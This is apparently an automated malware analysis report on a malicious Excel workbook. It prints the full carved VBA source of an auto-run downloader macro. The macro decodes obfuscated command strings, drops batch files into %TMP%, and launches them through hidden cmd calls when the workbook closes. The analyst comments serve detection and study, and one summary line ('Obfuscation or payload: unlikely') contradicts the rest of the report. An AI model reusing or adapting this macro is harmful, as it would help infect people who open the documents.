Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1feefebfacf95426…

MALICIOUS

Office (OOXML)

39.4 KB Created: 2018-10-16 16:44:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-02-04
MD5: 5a97ecacbd069de57dd3157771a93bc4 SHA-1: 93a16e6a0dfddb45c400972fa11ec982d3a71bde SHA-256: 1feefebfacf954266e96975cc69e70d752cf873f3bdd26c69e47c640b03b5744
156 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is an Excel document containing a Workbook_Open VBA macro. This macro is designed to construct a path to a temporary executable file and download a second-stage payload. The script uses obfuscated string concatenation to build the download URL and executable path, indicating downloader functionality. The presence of a Workbook_Open macro and the execution of a downloaded payload are strong indicators of malicious intent.

Heuristics 4

  • ClamAV: Doc.Malware.Generic-6883284-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6883284-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Dim ql1, ql2, ql3, ql4, ql5 As String
    Sub workbook_open()
    #Const CVV = "34567_8989"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        NameLoad = ""
        romp = Environ("tmp")

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10505 bytes
SHA-256: 28058f7e4fa0802e947ce35a95698eb634402ccf7e7c1d53d24afdc590bbffe7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
 #If Win64 Then
' kernel32!GetVersionExA import (PtrSafe variant for 64-bit Office). Nothing in
' the extracted listing calls it and VerWin() below is an empty stub, so this
' looks like leftover/decoy code — NOTE(review): confirm against the full vbaProject.bin.
Private Declare PtrSafe Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long  ''PtrSafe
#Else
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long  ''PtrSafe
#End If

' Win32 OSVERSIONINFO layout for the GetVersionEx import above. Only referenced
' by that declaration; no code in this listing instantiates or fills it.
Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

' Module-level state shared by the procedures below.
' NameJob / NameApp / NameLoad are filled in as side effects of GetRandJName /
' GetRandName / GetRandName2 and spliced into the command strings built in Forsa().
Dim NameJob As String
Dim NameApp As String
Dim TT As String                  ' only referenced in a commented-out line of GetRandTime
Dim NameLoad As String
Dim Count As Byte                 ' incremented by GetRandName/GetRandName2, never tested in this listing
' VBA quirk: in a comma-separated Dim only the last name takes the type, so
' ql1..ql4 are Variant and only ql5 is String.
Dim ql1, ql2, ql3, ql4, ql5 As String
' Auto-run entry point: Excel raises this when the workbook opens with macros
' enabled (the OLE_VBA_WBOPEN finding). The #Const / #If block tests a
' conditional-compilation name `v` that is never defined, and both branches are
' commented-out MsgBox calls, so it is decoy text rather than logic.
Sub workbook_open()
#Const CVV = "34567_8989"
#If v = "8890/9200=op" Or v = "ffgr.17763.RTG" Then
''MsgBox "ok"
#Else
''MsgBox "else"
#End If

Dim SSS As Integer                ' declared, never used

' Reset the shared globals, then call the builder stage with the magic value
' 2000 — Forsa only does work when ROUD = 20 * 100.
NameJob = ""
Count = 0
NameApp = ""
NameLoad = ""

Forsa 2000

End Sub
' Builder stage; the only caller in this listing is workbook_open (Forsa 2000).
' Gate: ROUD = 20 * 100 = 2000 — any other value skips to the decoy assignments
' after End If. NXT is never read.
' Inside the gate the visible code:
'   1. calls VerWin (an empty stub) and reads %TMP% via Environ("tmp");
'   2. builds ql1..ql5 from Gluma(ciphertext, key) fragments (see Gluma) joined
'      with random names — GetRandName sets NameApp, GetRandName2 sets NameLoad,
'      GetRandJName sets NameJob (always "HondaDa") — and the ".exe" suffix from
'      GetRandExp;
'   3. parks ql3/ql4/ql5 in Form1.Label2/Label3/Label4. Label4 (= ql5) is later
'      handed to ShellExecute by Form1.Plasta1111_Change; Label2/Label3 are only
'      read into unused locals there;
'   4. writes ql1..ql5 verbatim to %TMP%\groove1.bat .. groove5.bat.
' The cipher fragments are left as carved and are not decoded in these notes.
' Hunting hint: EXCEL.EXE creating *.bat files under %TMP% at open time, followed
' by cmd.exe spawned from EXCEL.EXE on workbook close (see Workbook_BeforeClose).
Sub Forsa(ROUD As Integer, Optional NXT As Byte = 0)
Dim ff
Dim romp As String

If ROUD = 20 * 100 Then
   VerWin                         ' no-op, see VerWin
    Count = 0
    NameApp = ""
    NameLoad = ""
    romp = Environ("tmp")         ' OLE_VBA_ENVIRON finding: drop directory
    
    ' ql1: decoded fragment + 7 random chars (GetRandName(10) -> NameApp) + ".exe" + decoded fragment
    ql1 = Gluma("a2c%\/%a2c%\a%adow%\t%\r%YieVce/Y3bwbms2yp3.embxc2eV sns%Yms2oY3", "ndm e3Vc2%syrapYbw/xot.i\") + GetRandName(10) + GetRandExp() + _
        Gluma("ettegp3b&g4r%aao3\m.vpettegp3b&g4r%aao3 m.vpettegp3b&g4r%aao32m.vp", "3p2ram &\%vbet4go.")
    
    
    ' ql2: two decoded fragments separated by CRLF (Chr(13) + Chr(10))
    ql2 = Gluma("n/em2wmn/em2nm-riamoim.mhhhcwdiagpntcn /", "hi.m-dtrc/oegwn2 pa") + Chr(13) + Chr(10) + Gluma("s qo(hhlhe(=(eoggmq.u(rqn0ugh0var(%i)%lctq(eu(q.u(rqn0uguyvu(rhlr0hfrv)lhat", "ur(%anyh.o0vfi)lm= stecgq")
    
    ' ql3: uses GetRandTime(3) (a number 3..5), NameApp, NameJob ("HondaDa") and
    ' GetRandName2(11) (8 random chars -> NameLoad) + ".exe"
    ql3 = Gluma("e itcote itcet/m rud/tc/t", "/eodmtcrui ") + GetRandTime(3) + Gluma("a&o%nbk/ma\\arpkter ", "ne&rtaok\bp/%m ") + NameApp + Gluma("t /sfrneast", " en/fstar") + _
        GetRandJName(10) + Gluma("yowq p%qiwyofahqahldyrh/ryrllftoo:gin:ola.h\.%.sy:l.ef:m", "sqleyang%.dip/:\whfotm r") + GetRandName2(11) + GetRandExp()

    ' ql4: uses GetRandTime(4) (4..6), NameLoad, NameApp + ".exe"
    ql4 = Gluma("/ret ct/ret /tiorudmit it", "dur/toemc i") + GetRandTime(4) + Gluma("/atp&mor\/ee/nko bn%", "&n/p\metab% okr") + NameLoad + _
        Gluma("lddlt2vl ml gl&12b\&r%appq23/.f1l&12b\&r%appq2o/.f1l&12b\&r%appq2e/.f1", "gt2rbl%1oa.v&3pf/qde\m ") + _
         Gluma("g avo\ tm4ee5vbp.rag avo\ tm4ee5v%p.rag avo\ t", "p%ambv\ ro.5tg4e") + NameApp + GetRandExp()
    
    
    
    ' ql5: uses GetRandTime(13) (13..15), NameApp and NameJob, ends with the literal " 4"
    ql5 = Gluma("ireud/uireudiucor mtcudcu", "rd tim/euco") + GetRandTime(13) + Gluma("nmt/\&p anbbnrkpeor%", "ekr/n\pa&mt%o b") + NameApp + _
        Gluma("STNoP/gemgtmouu rsogiPS", "Ngm ei/tsSorTPu") + NameJob + _
        Gluma("m %%mppmte\&2t5", "&t2\m%pe 5") + NameApp + Gluma("iRy etSal eDMn r/Mi", "eRMaSD lt/ynir") + NameJob + " 4"
        
    ' Stash three of the strings in the UserForm so the close-time event chain
    ' in Form1 can reach them without touching these globals again.
    With Form1
        .Label2 = ql3
        .Label3 = ql4
        .Label4 = ql5
    End With

    ' Drop each string as its own batch file in %TMP%.
    ff = FreeFile
    Open romp + "\groove1.bat" For Output As #ff
    Print #ff, ql1
    Close #ff

    ff = FreeFile
    Open romp + "\groove2.bat" For Output As #ff
    Print #ff, ql2
    Close #ff

    ff = FreeFile
    Open romp + "\groove3.bat" For Output As #ff
    Print #ff, ql3
    Close #ff

    ff = FreeFile
    Open romp + "\groove4.bat" For Output As #ff
    Print #ff, ql4
    Close #ff

    ff = FreeFile
    Open romp + "\groove5.bat" For Output As #ff
    Print #ff, ql5
    Close #ff
End If

' Decoy tail, runs for any ROUD. ql3 and ql4 are module globals, so the command
' strings are overwritten with junk after the files were written (the copies
' parked in Form1 survive); romp is local, so that assignment is pure noise.
romp = "llkjJHghhhcj^^^8834jhjHGG1244h__++"
ql3 = "srfertgUTYYTYtdswgefhhu45"
ql4 = "KJHJGHHGhghhsdgfg7^&^&%555df"
End Sub
' Empty stub called once from Forsa(); returns the default empty string. The
' name suggests an OS-version check (cf. the unused GetVersionEx import) but no
' such logic is present in the carved source.
Function VerWin() As String
'dfdf6745
End Function
' String de-obfuscation routine: a substitution cipher keyed by MK.
' For every character of ES: find its 1-based position in MK (InStr), step back
' Offset (default 6) positions — wrapping around the end of MK — and emit the
' character found there. A character of ES that does not occur in MK gives
' InStr = 0, falls into the Else branch, and yields the fixed character at
' position Len(MK) - Offset. Every Gluma(...) call in Forsa() relies on this.
' VBA quirk: in "Dim I, CurPosSym, Offset As Integer" only Offset is Integer;
' I and CurPosSym are Variant. TEST1 is declared and never used.
Function Gluma(ES As String, MK As String, Optional Oset As Integer = 6) As String
Dim I, CurPosSym, Offset As Integer
Dim CurSymbol, NewSymbol As String
Dim NewString As String
Dim TEST1 As String
  Offset = Oset
  NewString = ""

  For I = 1 To Len(ES)
    CurSymbol = Mid(ES, I, 1)
    CurPosSym = InStr(1, MK, CurSymbol)        ' 0 when CurSymbol is not in the key
     If CurPosSym - Offset > 0 Then
        NewSymbol = Mid(MK, CurPosSym - Offset, 1)
      Else
        NewSymbol = Mid(MK, CurPosSym + Len(MK) - Offset, 1)   ' wrap-around
      End If
    NewString = NewString + NewSymbol
  Next I
  Gluma = NewString
End Function
' Returns a decimal string in the range minT .. minT + 2 (Rnd is in [0, 1), so
' Int(Rnd * 3) is 0..2). Forsa() uses it to vary a numeric field in ql3/ql4/ql5.
Function GetRandTime(minT As Integer) As String
Dim R As Integer
    Randomize
    R = Int(Rnd * 3) + minT
    ''TT = CStr(R)
    GetRandTime = CStr(R)
End Function
' Random file-name generator with side effects: the result is also stored in the
' global NameApp and Count is incremented.
' C <= 4 is re-drawn as 5..16. The loop runs I = 4 To C, so the output has C - 3
' characters (7 for the GetRandName(10) call in Forsa). Each character is ASCII
' 33..126; the codes listed in the Case line (" % & * + , / : ; < = > ? \ | and
' parentheses) are replaced by 48 ('0'), i.e. characters that would break a path
' or a cmd argument are filtered out.
' VBA quirk: "Dim R, I As Integer" / "Dim S, tS As String" type only I and tS; R and S are Variant.
Function GetRandName(C As Integer) As String
Dim R, I As Integer
Dim S, tS As String
    Randomize
    S = ""
    tS = ""
    If C <= 4 Then C = Int((16 - 5 + 1) * Rnd + 5)
    For I = 4 To C
        R = Int((126 - 33 + 1) * Rnd + 33)
        Select Case R
        Case 37, 38, 34, 42, 47, 58, 60, 62, 63, 92, 124, 38, 43, 44, 59, 61, 40, 41: R = 48
        ''Case 65 To 90:
        End Select
        
        tS = Chr(R)
        S = S + tS
        tS = ""
    Next I
''S = Chr(34) + S + Chr(34)
    NameApp = S
    Count = Count + 1
    GetRandName = S
End Function

' Identical to GetRandName (same re-draw of C, same I = 4 To C loop, same
' ASCII 33..126 draw with the same metacharacters folded to '0') except that the
' result is stored in the global NameLoad instead of NameApp. Forsa calls it with
' C = 11, giving 8 characters.
Function GetRandName2(C As Integer) As String
Dim R, I As Integer
Dim S, tS As String
    Randomize
    S = ""
    tS = ""
    If C <= 4 Then C = Int((16 - 5 + 1) * Rnd + 5)
    For I = 4 To C
        R = Int((126 - 33 + 1) * Rnd + 33)
        Select Case R
        Case 37, 38, 34, 42, 47, 58, 60, 62, 63, 92, 124, 38, 43, 44, 59, 61, 40, 41: R = 48
        ''Case 65 To 90:
        End Select
        
        tS = Chr(R)
        S = S + tS
        tS = ""
    Next I
    ''S = Chr(34) + S + Chr(34)
    NameLoad = S
    Count = Count + 1
    GetRandName2 = S
End Function

' Empty stub with no declared return type; not called anywhere in this listing.
Function GetRandPath()
End Function
' Returns the extension ".exe" assembled from character codes (46 '.', 101 'e',
' 120 'x', 101 'e') so the literal never appears in the macro text. N is ignored.
Function GetRandExp(Optional N As Byte)
    GetRandExp = Chr(46) + Chr(101) + Chr(120) + Chr(101)
End Function
' Empty handler. Document_Close is a Word Document event name; in an Excel
' ThisWorkbook module the host never raises it — presumably leftover from a template.
Private Sub Document_Close()


End Sub

' Draws a random letters-only string (ASCII 65..122 with 91..96 folded to 'A'),
' then DISCARDS it: S is overwritten with the constant "HondaDa" before being
' stored in the global NameJob and returned. NameJob is therefore always
' "HondaDa" — a static token worth pivoting on for this sample.
' C <= 5 is re-drawn as 6..16; the loop runs I = 5 To C. R and S are Variant
' (comma-separated Dim quirk).
Function GetRandJName(C As Integer) As String
Dim R, I As Integer
Dim S, tS As String
    Randomize
    S = ""
    tS = ""
    If C <= 5 Then C = Int((16 - 6 + 1) * Rnd + 6)
    For I = 5 To C
        R = Int((122 - 65 + 1) * Rnd + 65)
        Select Case R
        Case 91 To 96: R = 65
        ''Case 65 To 90:
        End Select
        
        tS = Chr(R)
        S = S + tS
        tS = ""
    Next I
    S = "HondaDa"                ' random result thrown away here
    ''S = Chr(34) + S + Chr(34)
    NameJob = S
    GetRandJName = S
End Function

' Empty handler; Word Document event name, never raised by Excel for this module.
Private Sub Document_New()

End Sub


' Execution trigger. Workbook_Open/Forsa only build strings and drop .bat files;
' process creation is deferred to workbook close, which makes the open-time
' behaviour look passive to a short-lived sandbox run.
' Gate: Form1.Label1.Width + .Top > 90 — a form-geometry check; its design-time
' values are not in macros.bas, so whether it is always true cannot be confirmed here.
' When it passes: ql1 is copied into Label1.Caption, the global ql1 is replaced
' with junk, and Form1.Label1_Click is called, which starts the Plasta*_Change
' event chain that ends in SRAT22/ShellExecute with Label1 (= ql1) and Label4 (= ql5).
Private Sub Workbook_BeforeClose(Cancel As Boolean)

With Form1.Label1
    If .Width + .Top > 90 Then
        .Caption = ql1
        ql1 = "kjJHGGGghjdkk"              ' scrub the global after handing it to the form
        'MsgBox ("123")
        Form1.Label1_Click
    End If
End With
End Sub

' Empty handler (no-op).
Private Sub Workbook_BeforePrint(Cancel As Boolean)

End Sub

' Empty handler (no-op).
Private Sub Workbook_Deactivate()

End Sub

' Empty handler (no-op).
Private Sub Workbook_NewSheet(ByVal Sh As Object)

End Sub


' Empty handler (no-op).
Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Form1"
Attribute VB_Base = "0{D3CB86E9-6312-4184-B384-91BF9A87C001}{ED77D350-7BBB-4C1E-B402-B10DE997549B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Option Explicit
#If Win64 Then
' shell32!ShellExecuteA import — the process-creation primitive used by SRAT22
' below. SWN is declared but not referenced anywhere in this listing.
Private Declare PtrSafe Function ShellExecute Lib "shell32" _
    Alias "ShellExecuteA" (ByVal hwnd As Long, _
    ByVal lpOperation As String, ByVal lpFile As String, _
    ByVal lpParameters As String, ByVal lpDirectory As String, _
    ByVal nShowCmd As Long) As Long
Private Const SWN = 1
#Else
Private Declare Function ShellExecute Lib "shell32" _
    Alias "ShellExecuteA" (ByVal hwnd As Long, _
    ByVal lpOperation As String, ByVal lpFile As String, _
    ByVal lpParameters As String, ByVal lpDirectory As String, _
    ByVal nShowCmd As Long) As Long
Private Const SWN = 1
#End If

' Last link of the event chain (Label1_Click -> Plasta1_Change -> Plasta11_Change
' -> Plasta111_Change -> Plasta1111_Change). Gated on control widths; when it
' passes, Label1.Caption (set to ql1 by Workbook_BeforeClose) and Label4.Caption
' (ql5 from Forsa) are each passed as the parameter string to "cmd" through
' SRAT22 with hwnd 0 and nShowCmd 0. The return values j1/j2 are never inspected
' (SRAT22 returns the constant 101 anyway).
' VBA quirk: lola and j1 are Variant; only mora and j2 carry the declared types.
Private Sub Plasta1111_Change()
Dim lola, mora As String
Dim j1, j2 As Integer
   If Plasta1111.Width > Plasta111.Width + Plasta11.Width + Plasta1.Width Then
       lola = Label1.Caption
       mora = Label4.Caption
       'MsgBox ("4")
       j1 = SRAT22(0, "cmd", lola, 0)
        j2 = SRAT22(0, "cmd", mora, 0)
  End If
End Sub
' Chain link 4. Gate: Plasta11.Width > Plasta11.Height + 12. Reads Label2.Caption
' (ql3) into QQ, which is never used, then assigns Plasta1111.Text — that
' assignment is what fires Plasta1111_Change; the literal itself is junk.
Private Sub Plasta111_Change()
Dim QQ As String
    If Plasta11.Width > Plasta11.Height + 12 Then
        QQ = Label2.Caption
        Plasta1111.Text = "KLKLKJhhshdhjj34k8887712hHHJJhyhhsd"
    End If
End Sub

' Effectively a no-op: assigns a local and returns. Not part of the event chain.
Private Sub Label3_Click()
Dim GG As Integer
    GG = 2135
End Sub
' Chain link 3. Gate: Plasta111.Width > 25. Reads Label1.Caption into OO0 (never
' used) and assigns Plasta111.Text, which fires Plasta111_Change.
Private Sub Plasta11_Change()
Dim OO0 As String
    If Plasta111.Width > 25 Then
        OO0 = CStr(Label1.Caption)
        Plasta111.Text = "jjjsghd&&&*(9934jjjggghjHGFF%%$#@@^&&"
    End If
End Sub
' Chain link 1. Public so ThisWorkbook.Workbook_BeforeClose can call it directly
' without a user click; setting Plasta1.Value fires Plasta1_Change.
Public Sub Label1_Click()
    Plasta1.Value = 93491
End Sub
' Process launcher. Calls ShellExecuteA(hwnd = pid, verb = vbNullString, file =
' pam1, parameters = pam2, directory = Application.Path, show = pamW) only when
' pam1 is exactly three characters with 'm' (Asc 109) in the middle — the callers
' pass the literal "cmd" and pamW = 0 (SW_HIDE). The ShellExecute result is then
' unconditionally overwritten with 101, so callers cannot tell whether the launch
' succeeded. Detection angle: cmd.exe as a child of EXCEL.EXE whose working
' directory is the Office install path.
Function SRAT22(ByVal pid As Integer, ByVal pam1 As String, ByVal pam2 As String, pamW As Integer) As Integer
    If Len(pam1) = 3 And Asc(Mid(pam1, 2, 1)) = 109 Then
        SRAT22 = ShellExecute(pid, vbNullString, pam1, pam2, Application.Path, pamW)
    End If
   SRAT22 = 101                   ' clobbers the real return value
End Function

' Chain link 2. Gate: Plasta11.Height > 3. Assigning Plasta11.Text fires
' Plasta11_Change; the literal is junk.
Private Sub Plasta1_Change()
    If Plasta11.Height > 3 Then
        Plasta11.Text = "kkHHggg7736%$$767384jjhGFtgty34"
    End If
End Sub

' No-op: assigns a junk literal to a local and returns.
Private Sub UserForm_Click()
    Dim KL1 As String
    KL1 = "HHGFfhshjHG$$%^&*123ujHHTThjjsdlkjhggdf"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 41984 bytes
SHA-256: 96ff0c463968a67f05708f0664fcf4aed56a57e1410520a1b93567c0c096bf06
Detection
ClamAV: Doc.Malware.Generic-6883284-0
Obfuscation or payload: unlikely